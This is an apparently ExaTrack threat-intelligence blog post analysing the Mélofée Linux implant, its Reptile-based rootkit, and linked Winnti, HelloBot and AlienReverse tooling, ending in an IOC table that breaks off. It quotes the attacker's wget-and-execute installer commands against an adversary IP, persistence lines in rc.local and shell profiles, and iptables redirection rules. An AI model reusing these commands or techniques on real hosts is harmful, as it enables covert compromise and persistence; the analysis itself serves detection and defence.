<!DOCTYPE html>
<html lang="fr-FR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Mélofée: a new alien malware in the Panda&#39;s toolset targeting Linux hosts</title>
	
	

    <meta name="google-site-verification" content="DtVWbMESh7RXwprdhaajNe5DHLlfo66VHbNb9MCTPuw" />

    <title>ExaTrack</title>

    
    <link href="../css/bootstrap.min.css" rel="stylesheet">

	<link rel="stylesheet" href="../css/creative.css">
	<link rel="stylesheet" href="../css/style.css">

    
    <script src="../js/jquery.min.js"></script>


    <link href="../css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Merriweather:400,300,300italic,400italic,700,700italic,900,900italic' rel='stylesheet' type='text/css'>


    
    <script src="../js/bootstrap.min.js"></script>

    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script>

    <script src="../js/scrollreveal.min.js"></script>
    <script src="../js/jquery.magnific-popup.min.js"></script>
    
    <script src="../js/creative.min.js"></script>

</head>


<body>
    <header>
    <nav id="mainNav" class="navbar navbar-default navbar-fixed-top affix-top">
        <div class="container-fluid">
            
            <div class="navbar-header">
                <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                    <span class="sr-only">Toggle navigation</span> Menu <i class="fa fa-bars"></i>
                </button>
                <a class="navbar-brand" href="https://www.exatrack.com"><img src="../img/exatrack.png" style="height:30px"/> </a>
            </div>

            
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="https://exatrack.com">Qui sommes nous ?</a>
                    </li>
                    <li>
                        <a href="https://exatrack.com/recherche_compromission.html">Recherche de compromission</a>
                    </li>
                    <li>
                        <a href="https://exatrack.com/reponse_incident.html">Réponse sur incident</a>
                    </li>
                    <li>
                        <a href="https://exatrack.com/threat_intel.html">Threat Intelligence</a>
                    </li>
                    <li>
                        <a href="../">Blog</a>
                    </li>
                    <li>
                        <a class="page-scroll" href="#contact">Contact</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>
</header>


	

        
            
                
            
        
    


    <article class="container">
        <h1>Mélofée: a new alien malware in the Panda&#39;s toolset targeting Linux hosts</h1>
        <time datetime="2023-03-28T00:00:00">28.03.2023 00:00</time>
        <div>
            <p>We recently discovered an novel undetected implant family targeting Linux servers, which we dubbed <em>Mélofée</em>.</p>
<p>We linked with high confidence this malware to chinese state sponsored APT groups, in particular the notorious <em>Winnti</em> group.</p>
<p>In this blogpost we will first analyze the capabilities offered by this malware family, which include a kernel mode rootkit, and then deep dive in an infrastructure pivot maze to discover related adversary toolsets.</p>
<figure class="centerfigure"><img src="img/panda.png"
         alt="adversarypanda" height="700px"/>
</figure>

<h2 id="mélofée-implant-analysis">Mélofée implant analysis</h2>
<p>We found three samples of this malware family, which we dubbed <em>Mélofée</em>.</p>
<p>Two of these samples included a version number (<code>20220111</code>, <code>20220308</code>), and we assess that the last sample was likely dated from late April or May 2022.</p>
<p>All these samples shared a common code base, but showed a constant development in the following domains:</p>
<ul>
<li>evolutions of the communication protocol and the packet format</li>
<li>change in the encryption of the configuration, using first <code>RC4</code> and then a simple <code>xor</code></li>
<li>the development of a <code>SelfForwardServer</code> functionality</li>
<li>lastly, the inclusion of a kernel mode rootkit in the last sample.</li>
</ul>
<h3 id="rootkit">Rootkit</h3>
<p>The first sample we found dropped a rootkit based on a modified version of the open source projet <code>Reptile</code> <sup id="fnref:1"><a href="#fn:1" class="footnote-ref" role="doc-noteref">1</a></sup>.</p>
<p>According to the <code>vermagic</code> metadata, it is compiled for a kernel version <code>5.10.112-108.499.amzn2.x86_64</code>.
The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.</p>
<p>The rootkit hooks the functions <code>fillonedir</code>, <code>filldir</code> and <code>filldir64</code> in order to not display files with names containing <code>intel_audio</code> or <code>rc.modules</code> when listing a directory.</p>
<p>It also hooks the <code>inet_ioctl</code> function in order to be able to communicate with its userland part using the <code>ioctl</code> system call.
The kernel rootkit expects the userland component to send a value of <code>0xe0e0e0e</code> during the IOCTL call, with 2 commands supported (these two commands being <code>hide</code> and <code>show</code>).</p>
<p>The rootkit is loaded both by the <em>installer</em> and <em>server</em> components with a call to the <code>insmod</code> utility.</p>
<h3 id="installer">Installer</h3>
<p>The implant and the rootkit were installed using shell commands downloading both the installer and a custom binary package from
an adversary controlled server. This behaviour is similar to the installation process of <em>Winnti</em> Linux rootkits.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wget http://173.209.62<span style="color:#f92672">[</span>.<span style="color:#f92672">]</span>186:8765/installer -O /var/tmp/installer
</span></span><span style="display:flex;"><span>wget http://173.209.62<span style="color:#f92672">[</span>.<span style="color:#f92672">]</span>186:8765/a.dat -O /var/tmp/usbd;
</span></span><span style="display:flex;"><span>chmod +x /var/tmp/installer;
</span></span><span style="display:flex;"><span>/var/tmp/installer -i /var/tmp/usbd
</span></span></code></pre></div><p>The installer is also developped in <code>C++</code>, and takes the binary package as an argument.
It then then proceeds to extract and install both the rootkit and the <em>server</em> component.
The rootkit and implant paths are hardcoded to respectively <code>/etc/intel_audio/intel_audio.ko</code> and <code>/etc/intel_audio/audio</code>
The installer inserts the kernel rootkit using a call to <code>system(&quot;insmod /etc/intel_audio/intel_audio.ko&quot;)</code>,
and also install the persistance in the <code>/etc/rc.modules</code> file.</p>
<p>Writing to this script ensures that both kernel and implant are executed at boot time<sup id="fnref:2"><a href="#fn:2" class="footnote-ref" role="doc-noteref">2</a></sup>.</p>
<p>The resulting script after installation can be seen below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e">#Script for starting modules</span>
</span></span><span style="display:flex;"><span>/sbin/insmod /etc/intel_audio/intel_audio.ko
</span></span><span style="display:flex;"><span>/etc/intel_audio/audio
</span></span><span style="display:flex;"><span><span style="color:#75715e">#End script</span>
</span></span></code></pre></div><p>The first bytes of the package includes the offset to the payload (in little endian), which is used to correctly extract the kernel rootkit and the <em>server</em> implant.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hexdump" data-lang="hexdump"><span style="display:flex;"><span>00000000: <span style="color:#ae81ff">b07e</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">a841</span> <span style="color:#ae81ff">3000</span> <span style="color:#ae81ff">7f45</span> <span style="color:#ae81ff">4c46</span> <span style="color:#ae81ff">0201</span> <span style="color:#ae81ff">0100</span>  <span style="color:#e6db74">.~...A0..ELF....</span>
</span></span><span style="display:flex;"><span>00000010: <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0100</span> <span style="color:#ae81ff">3e00</span> <span style="color:#ae81ff">0100</span> <span style="color:#ae81ff">0000</span>  <span style="color:#e6db74">..........&gt;.....</span>
</span></span><span style="display:flex;"><span>00000020: <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span> <span style="color:#ae81ff">0000</span>  <span style="color:#e6db74">................</span>
</span></span></code></pre></div><p>The developper was also kind enough to includes an <code>usage</code> function describing the installer&rsquo;s options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">usage</span>(undefined8 param_1)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">printf</span>(<span style="color:#e6db74">&#34;Usage: &lt;%s&gt; [options]</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,param_1);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">puts</span>(<span style="color:#e6db74">&#34;    -r                  Remove&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">puts</span>(<span style="color:#e6db74">&#34;    -i &lt;data file&gt;      Install&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">puts</span>(<span style="color:#e6db74">&#34;    -d                  Run in background&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">puts</span>(<span style="color:#e6db74">&#34;    -h                  Show help&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h3 id="configuration-management">Configuration management</h3>
<p>The configuration is encrypted using the <em>RC4</em> algorithm in the two early samples, and with a simple <code>xor</code> with a single byte key (<code>0x43</code>) in the undated sample.</p>
<p>The configuration format has changed between the samples, the first one containing all elements in encrypted form, and the last one with only the C&amp;C domain encrypted.</p>
<p>Example of decrypted configuration:</p>
<p><code>1:www.data-yuzefuji[.]com:443:5</code></p>
<p>This configuration contains the following elements:</p>
<ul>
<li>The socket type (<code>0x1</code> being <code>TCP</code>)</li>
<li>The C&amp;C domain</li>
<li>The communication port</li>
<li>The sleeptime in minutes between requests</li>
</ul>
<h3 id="persistance-mechanisms">Persistance mechanisms</h3>
<p>The implant has two mechanisms of persistance, depending on its running privileges.
If it runs as the <code>root</code> user, it tries to write a line containing <code>sh -c IMPLANT_EXECUTABLE_NAME  &gt;/dev/null 2&gt;&amp;</code> in the files <code>/etc/rc.local</code> or <code>/etc/rc.d/rc.local</code>.</p>
<p>If it runs as a simple user, it will try to install its persistance in the following files:</p>
<ul>
<li><code>/home/CURRENT_USERNAME/.bash_profile</code></li>
<li><code>/home/CURRENT_USERNAME/.bash_login</code></li>
<li><code>/home/CURRENT_USERNAME/.profile</code></li>
</ul>
<p>The rootkit installer will insert the persistance for the kernel module in the <code>/etc/rc.modules</code> file.</p>
<h3 id="supported-commands">Supported commands</h3>
<p>The commands supported by the implant have evolved between the samples, showing current development of the backdoor.</p>
<p>The first two versions:</p>





<table class="table table-striped table-bordered">
<thead>
<tr>
<th>Command ID</th>
<th>Capability</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>0x103</code></td>
<td><code>ping_back</code></td>
<td>Sent by the client</td>
</tr>
<tr>
<td><code>0x1</code></td>
<td><code>uninstall</code></td>
<td>Kill the current process and removes the persistance</td>
</tr>
<tr>
<td><code>0x2</code></td>
<td><code>update_and_relaunch</code></td>
<td>Overwrite the current running file and relaunch</td>
</tr>
<tr>
<td><code>0x3</code></td>
<td><code>launch_new_command_thread</code></td>
<td>Creates a new socket for interaction</td>
</tr>
<tr>
<td><code>0x4</code></td>
<td><code>write_file</code></td>
<td></td>
</tr>
<tr>
<td><code>0x5</code></td>
<td><code>read_file</code></td>
<td></td>
</tr>
<tr>
<td><code>0x6</code></td>
<td><code>launch_shell</code></td>
<td></td>
</tr>
<tr>
<td><code>0x7</code></td>
<td><code>create_socket</code></td>
<td><code>0x0</code>: TCP, <code>0x1</code>: TLS, <code>0x2</code>: UDP</td>
</tr>
<tr>
<td><code>0x10</code></td>
<td><code>send_local_information</code></td>
<td>Hostname, date, current UID, implant version number, &hellip;</td>
</tr>
<tr>
<td><code>0x50001</code></td>
<td><code>list_directory</code></td>
<td></td>
</tr>
<tr>
<td><code>0x50002</code></td>
<td><code>create_directory</code></td>
<td></td>
</tr>
<tr>
<td><code>0x50003</code></td>
<td><code>not_implemented</code></td>
<td></td>
</tr>
<tr>
<td><code>0x50004</code></td>
<td><code>delete_directory</code></td>
<td>Wrapper over <code>system(&quot;rm -fr %s)</code></td>
</tr>
</tbody>
</table>


<p>Last version:</p>





<table class="table table-striped table-bordered">
<thead>
<tr>
<th>Command ID</th>
<th>Capability</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>0x10005</code></td>
<td><code>reset_timer</code></td>
<td></td>
</tr>
<tr>
<td><code>0x10002</code></td>
<td><code>clean_and_exit</code></td>
<td></td>
</tr>
<tr>
<td><code>0x10004</code></td>
<td><code>create_socket</code></td>
<td>Create a bidirectional socket, probably used for proxying</td>
</tr>
<tr>
<td><code>0x40001</code></td>
<td><code>list_directory</code></td>
<td></td>
</tr>
<tr>
<td><code>0x40002</code></td>
<td><code>delete_directory</code></td>
<td>Wrapper over <code>system(&quot;rm -fr %s)</code></td>
</tr>
<tr>
<td><code>0x40003</code></td>
<td><code>rename</code></td>
<td></td>
</tr>
<tr>
<td><code>0x40004</code></td>
<td><code>create_directory</code></td>
<td></td>
</tr>
<tr>
<td><code>0x40005</code></td>
<td><code>write_file</code></td>
<td></td>
</tr>
<tr>
<td><code>0x40006</code></td>
<td><code>read_file</code></td>
<td></td>
</tr>
<tr>
<td><code>0x50001</code></td>
<td><code>exec_command_with_output</code></td>
<td></td>
</tr>
<tr>
<td><code>0x70001</code></td>
<td><code>write_integer_to_file</code></td>
<td>Purpose unknown, probably used for sleeptime</td>
</tr>
<tr>
<td><code>0x60001</code></td>
<td><code>launch_shell</code></td>
<td></td>
</tr>
<tr>
<td><code>0x90001</code></td>
<td><code>no_op</code></td>
<td></td>
</tr>
</tbody>
</table>


<h3 id="communication-protocols">Communication protocols</h3>
<p>The communication protocols have evolved in the three analyzed samples, however three socket types are implemented:</p>
<ul>
<li><code>TCPSocket</code> (type <code>0x0</code>) using raw TCP, with a custom packet format described below;</li>
<li><code>TLSSocket</code> (type <code>0x1</code>), using a TLS encrypted channel to exchange with the C&amp;C server;</li>
<li><code>UDPSocket</code> (type <code>0x2</code>), using the <code>KCP</code> protocol <sup id="fnref:3"><a href="#fn:3" class="footnote-ref" role="doc-noteref">3</a></sup> to send data. It should be noted that the <code>KCP</code> protocol is a public communication library, and is also used in several malware families such as <em>Amoeba</em> <sup id="fnref:4"><a href="#fn:4" class="footnote-ref" role="doc-noteref">4</a></sup> or <em>CrossWalk</em> <sup id="fnref:5"><a href="#fn:5" class="footnote-ref" role="doc-noteref">5</a></sup>;</li>
<li>Some leftover code seems to indicate that there could be a third type <code>0x3</code> for HTTP based communications, but it was not implemented in the analyzed samples.</li>
</ul>
<p>While the data is not encrypted in any form in two of the samples,
in the last one it is encrypted using the <code>RC4</code> algorithm with a hardcoded key ( <code>\x01\x02\x03\x04</code> repeated 4 times).</p>
<p>The packet formats used by <em>Mélofée</em> are the following:</p>
<pre tabindex="0"><code>struct Packet202201_3 {
    unsigned int dwCommand;
    unsigned int dwCommandResult;
    unsigned int dwUnknown;
    unsigned int dwDataSize;
    char [] clear_text_data;
}

struct Packet202205 {
    unsigned int dwUnknown;
    unsigned int dwRandom1;
    unsigned int dwRandom2;
    unsigned int dwCommandResult;
    unsigned int dwCommandID;
    unsigned int dwCommandSize;
    char [] encrypted_data;
}
</code></pre><h3 id="selfforwardserver-and-listening-server"><code>SelfForwardServer</code> and listening server</h3>
<p>In the latest sample, a new functionality was implemented, named <code>SelfForwardServer</code>.</p>
<p>Depending on a configuration flag, the implant can install <code>iptables</code> rules to redirect TCP network traffic from port <code>57590</code></p>
<p>The steps to install these rules are the following:</p>
<ul>
<li>First a new <em>NAT</em> chain named is created <code>XFILTER</code> using the following command: <code> iptables -t nat -N %s</code></li>
<li>A redirection rule is added for the port in this <em>NAT</em> chain:<code>iptables -t nat -A %s -p tcp -j REDIRECT --to-port %d</code></li>
<li>Save the recent connections from port 45535 with the name <code>ipxles</code>: <code>iptables -t nat -A PREROUTING -p tcp --sport 45535 -m recent --set --name %s --rsource -j ACCEPT</code></li>
<li>Redirects recent <code>ipxles</code> connections to the <em>NAT</em> chain: <code>iptables -t nat -A PREROUTING -p tcp --dport %d --syn -m recent --rcheck --seconds 300 --name %s --rsource -j %s</code></li>
<li>Finally, the host is instructed to accept network traffic on the port <code>57590</code> using the command <code>iptables -I INPUT -p tcp --dport %d -j ACCEPT</code></li>
</ul>
<p>It should be noted that while the <code>SelfForwardServer</code> was deactivated in the configuration, the sample embedded both a self-signed certificate generated on <code>2021-06-03</code> and the corresponding private key to be used for securing communication in <code>Server</code> mode.</p>
<p>Some of the underlying code is also present in the two earlier samples (as documented by leftover <code>RTTI</code> information), and three types of server were available:</p>
<ul>
<li><code>TCPServer</code> (type <code>0x00</code>)</li>
<li><code>TLServer</code> (type <code>0x1</code>)</li>
<li><code>UDPServer</code> (type <code>0x2</code>)</li>
</ul>
<p>One interesting tidbit of this code is hidden in the <code>receive</code> function of the <code>TLSServer</code> (at address <code>0x429b7a</code> in the undated sample).
When the 4 first bytes received by this function using the <code>recv</code> library call are <code>03 01 d3 76</code>, a flag affecting the creation of the subsequent socket is set.
However, we could not identify precisely the purpose of this magic.</p>
<p>Because of the presence of unused code, and the evolutions between the samples, we assess that the <code>Server</code> and <code>SelfForwardServer</code> are currently under development by the attackers.</p>
<h2 id="another-pokemon-inside-the-attackers-toolset">Another pokemon inside the attacker&rsquo;s toolset</h2>
<p>We analyzed the infrastructure used by the attacker using pivot on both public and private datasets.
We assess that this malware family is probably linked to the <em>Amoeba</em> ant <em>Winnti</em> <sup id="fnref1:4"><a href="#fn:4" class="footnote-ref" role="doc-noteref">4</a></sup> <sup id="fnref:6"><a href="#fn:6" class="footnote-ref" role="doc-noteref">6</a></sup> <sup id="fnref:7"><a href="#fn:7" class="footnote-ref" role="doc-noteref">7</a></sup> <sup id="fnref:8"><a href="#fn:8" class="footnote-ref" role="doc-noteref">8</a></sup> state sponsored threat groups.</p>
<p>The infrastructure for the <em>Mélofée</em> implants are linked to the following tools:</p>
<ul>
<li>Some of the servers were tracked by our <a href="https://exatrack.com/threat_intel.html">Cyber Threat Intelligence</a> as <em>ShadowPad</em> C&amp;C servers;</li>
<li>Other servers were linked to both <em>Winnti</em> and <em>HelloBot</em> tools;</li>
<li>We also saw related domains used as C&amp;C servers for tools like <em>PlugX</em>, <em>Spark</em><sup id="fnref:9"><a href="#fn:9" class="footnote-ref" role="doc-noteref">9</a></sup>, <em>Cobalt Strike</em>, <em>StowAway</em> <sup id="fnref:10"><a href="#fn:10" class="footnote-ref" role="doc-noteref">10</a></sup>, and the legitimate <em>toDesk</em> remote control tool;</li>
<li>Lastly, the attacker also probably used the <em>ezXSS</em> <sup id="fnref:11"><a href="#fn:11" class="footnote-ref" role="doc-noteref">11</a></sup> tool, but we could not confirm why.</li>
</ul>
<h3 id="hellobot">Hellobot</h3>
<p><em>HelloBot</em> is a malware family also targeting Linux hosts and is known to be used by APT groups such as <em>Earth Berberoka</em> <sup id="fnref1:6"><a href="#fn:6" class="footnote-ref" role="doc-noteref">6</a></sup>. While pivoting on the <em>Mélofée</em> infrastructure, we found a common IP with an <em>HelloBot</em> sample, which provided another point to dig in.</p>
<p>We found several samples of this malware and developped a custom configuration extraction script (provided in the annexes of this blog post).</p>
<p>Using the configurations extracted, we also were able to find strong infrastructure links between <em>HelloBot</em> and <em>Winnti</em>, for example both used a subdomain of <code>git1ab[.]com</code> and <code>cloudf1are[.]com</code> as C&amp;C servers.</p>
<h3 id="probable-links-with-winnti">Probable links with <em>Winnti</em></h3>
<p>The response issued by the C&amp;C server at the IP address <code>173.209.62.186</code> on the port 443 could be uniquely
linked to another domain <code>dev.yuanta.dev</code>.
This server was known to be used to stage archives containing an installer for the Linux version of the <em>Winnti</em> rootkit <sup id="fnref1:7"><a href="#fn:7" class="footnote-ref" role="doc-noteref">7</a></sup>.</p>
<p>We also downloaded several samples of this malware family, extracted the configuration (using the script provided by <em>Chronicle</em>), and found
several common domains between <em>HelloBot</em> and <em>Winnti</em>, such as <code>cloudf1are[.]com</code> and <code>git1ab[.com</code>.</p>
<h3 id="analysis-graph">Analysis graph</h3>
<p>Using the previous datapoints, we generated an infrastructure graph to draw the relations between the samples.</p>
<figure><img src="img/invest_graph.png"
         alt="Investigation graph" width="100%"/>
</figure>

<p>We assess with high confidence that <em>HelloBot</em>, <em>Winnti</em> and <em>Mélofée</em> are all related and were used by Chinese state sponsored attacker groups during at least all of 2022.</p>
<h3 id="alien">Alien</h3>
<p>During our analysis, we discovered another Linux implant dubbed <em>AlienReverse</em>.</p>
<p>This code was architectured in a similar manner as <em>Mélofée</em>, however there are several crucial differences:</p>
<ul>
<li>The data of the communication protocol was encrypted using <code>pel_decrypt</code> and <code>pel_encrypt</code> from the <code>Reptile</code> project <sup id="fnref1:1"><a href="#fn:1" class="footnote-ref" role="doc-noteref">1</a></sup>.</li>
<li>The command IDs were different, as can be seen below</li>
<li>The tool included several other public tools, such as <code>EarthWorm</code> <sup id="fnref:12"><a href="#fn:12" class="footnote-ref" role="doc-noteref">12</a></sup> and <code>socks_proxy</code> <sup id="fnref:13"><a href="#fn:13" class="footnote-ref" role="doc-noteref">13</a></sup>.</li>
</ul>
<p>There were however some common points between <em>Mélofée</em> and <em>AlienReverse</em></p>
<ul>
<li>Both implants were developped in <code>C++</code></li>
<li>Both implants used a file with a fixed ID in <code>/var/tmp/%s.lock</code> to ensure only one implant is running (this code was found in public <sup id="fnref:14"><a href="#fn:14" class="footnote-ref" role="doc-noteref">14</a></sup>, but seems rarely used in the wild)</li>
<li>This implant implemented a similar mechanism for limiting working hours (defined as <code>worktime</code>)</li>
</ul>
<p>The command supported by this implant were the following:</p>





<table class="table table-striped table-bordere<d">
<thead>
<tr>
<th>Command ID</th>
<th>Capability</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>0x110010</code></td>
<td><code>CmdBroadcast</code></td>
<td>Send encrypted data over the socket</td>
</tr>
<tr>
<td><code>0x110011</code></td>
<td><code>CmdOnRainUninstall</code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110020</code></td>
<td><code>CmdOnline</code></td>
<td>Send local information such as hostname, date, and current UID to the server</td>
</tr>
<tr>
<td><code>0x110061</code></td>
<td><code>FileManager</code></td>
<td>Supports several subcommands such as <code>OpenFile</code>, <code>CreateDir</code>, <code>FileEnum</code>, <code>FileDownload</code>, &hellip;</td>
</tr>
<tr>
<td><code>0x110062</code></td>
<td><code>ScreenSnapshot</code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110063</code></td>
<td><code>CmdOnTaskList</code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110064</code></td>
<td><code>CmdOnShellCommand</code></td>
<td>Launch interactive shell</td>
</tr>
<tr>
<td><code>0x110065</code></td>
<td><code>CmdOnShellActive </code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110066</code></td>
<td><code>CmdOnServiceList</code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110068</code></td>
<td><code>CmdOnPortMapping</code></td>
<td>Launches <code>EarthWorm</code> to perform the port mapping, supporting a scanning mode with another <code>AlienReverse</code> implant used as a proxy. Also implements the management of a <code>Socks</code> proxy</td>
</tr>
<tr>
<td><code>0x110073</code></td>
<td><code>CmdOnKbdRecord</code></td>
<td>Unimplemented</td>
</tr>
<tr>
<td><code>0x110075</code></td>
<td><code>CmdOnWorkTime</code></td>
<td>Writes the expected runtime hours in the file <code>/tmp/worktime</code></td>
</tr>
</tbody>
</table>


<p>The packet format used by the communication protocol is very similar to the one used by <em>Mélofée</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> AlienComzPacket {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwTickCount;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwMagic1; <span style="color:#75715e">// 0xa003001
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwMagic2; <span style="color:#75715e">// 0x10000137, also used to indicate if the packet has data
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwCommandID;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwTotalSize;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> dwEncryptedSize;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> ;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">char</span> []      data; <span style="color:#75715e">// The data encrypted using pel_encrypt
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>}
</span></span></code></pre></div><p>While we initially thought that this sample was related to the <em>Mélofée</em> family,
we came to the conclusion that it is a distinct tool.
However, we decided to include it in this report because it was used as a starting point in this investigation, and we think that sharing it to the public is important.</p>
<p>We also could not link it to known adversary groups, but we assess that it is likely used in targeted attacks.</p>
<h2 id="conclusion">Conclusion</h2>
<p>The <em>Mélofée</em> implant family is another tool in the arsenal of chinese state sponsored attackers,
which show constant innovation and development.</p>
<p>The capabilities offered by <em>Mélofée</em>  are relatively simple, but may enable adversaries to conduct their attacks under the radar.
These implants were not widely seen, showing that the attacker are likely limiting its usage to high value targets.</p>
<h2 id="annexes">Annexes</h2>
<h3 id="iocs">IOCs</h3>
<h4 id="hashes">Hashes</h4>





<table class="table table-striped table-bordered">
<thead>
<tr>
<th>SHA256</th>
<th>FileType</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>3ca39774a4405537674673227940e306cf5e8cd8dfa1f5fc626869738a489c3d</code></td>
<td>Text file</td>
<td>Installation commands</td>
</tr>
<tr>
<td><code>758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0</code></td>
<td>ELF x64 executable</td>
<td>Installer</td>
</tr>
<tr>
<td><code>a5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a</code></td>
<td>ELF x64 executable</td>
<td>Implant version <em>20220111</em></td>
</tr>
<tr>
<td><code>2db4adf44b446cdd1989cbc139e67c068716fb76a460654791eef7a959627009</code></td>
<td>ELF x64 executable</td>
<td>Implant version <em>20220308</em></td>
</tr>
<tr>
<td><code>8d855c28744dd6a9c0668ad9659baf06e5e448353f54d2f99beddd21b41390b7</code></td>
<td>ELF x64 executable</td>
<td>Implant with rootkit and without version number</td>
</tr>
<tr>
<td><code>f3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68</code></td>
<td>Binary file</td>
<td>Container of rootkit and implant probably used for installation</td>
</tr>
<tr>
<td><code>330a61fa666001be55db9e6f286e29cce4af7f79c6ae267975c19605a2146a21</code></td>
<td>PE x64 executable</td>
<td>Cobalt Strike beacon</td>
</tr>
<tr>
<td><code>7149cdb130e1a52862168856eae01791cc3d9632287f990d90da0cce1dc7c6b9</code></td>
<td>PE32   executable</td>
<td>Cobalt Strike beacon</td>
</tr>
<tr>
<td><code>a62b67596640a3ebadd288e733f933ff581cc1822d6871351d82bd7472655bb5</code></td>
<td>ELF x64 executable</td>
<td>StowAway proxy tool</td>
</tr>
<tr>
<td><code>3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88</code></td>
<td>ELF x64 executable</td>
<td><em>AlienReverse</em> implant</td>
</tr>
<tr>
<td><code>2e62d6c47c00458da9338c990b095594eceb3994bf96812c329f8326041208e8</code></td>
<td>ELF x32 executable</td>
<td><em>HelloBot</em> implant</td>
</tr>
<tr>
<td><code>407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200f0462b8</code></td>
<td>ELF x32 executable</td>
<td><em>HelloBot</em> implant</td>
</tr>
<tr>
<td><code>187b6a4c6bc379c183657d8eafc225da53ab8f78ac192704b713cc202cf89a17</code></td>
<td>ELF x32 executable</td>
<td><em>HelloBot</em> implant</td>
</tr>
<tr>
<td><code>2801a3cc5aed8ecb391a9638a3c6f8db58ca3002e66f11bf88f8c7c2e5a6b009</code></td>
<td>ELF x32 executable</td>
<td><em>HelloBot</em> implant</td>
</tr>
<tr>
<td><code>6e858c2c9ae20e3149cb0012ab9a24995aa331d2a818b127b2f517bc3aa745a0</code></td>
<td>PE x64 executable</td>
<td><em>Go</em> downloader for <em>toDesk</em></td>
</tr>
<tr>
<td><code>7684e1dfaeb2e7c8fd1c9bd65041b705bc92a87d9e11e327309f6c21b5e7ad97</code></td>
<td>PE x64 executable</td>
<td><em>Go</em> downloader for <em>toDesk</em></td>
</tr>
<tr>
<td><code>899ef7681982941b233e1ea3c1a6d5a4e90153bbb2809f70ee5f6fcece06cabc</code></td>
<td>PE x64 executable</td>
<td><em>Spark</em> implant</td>
</tr>
<tr>
<td><code>c36ab5108491f4969512f4d35e0d42b3d371033c8ccf03e700c60fb98d5a95f8</code></td>
<td>ELF x64</td>
<td>UPX Packed executable (probably NPS, to confirm)</td>
</tr>
<tr>
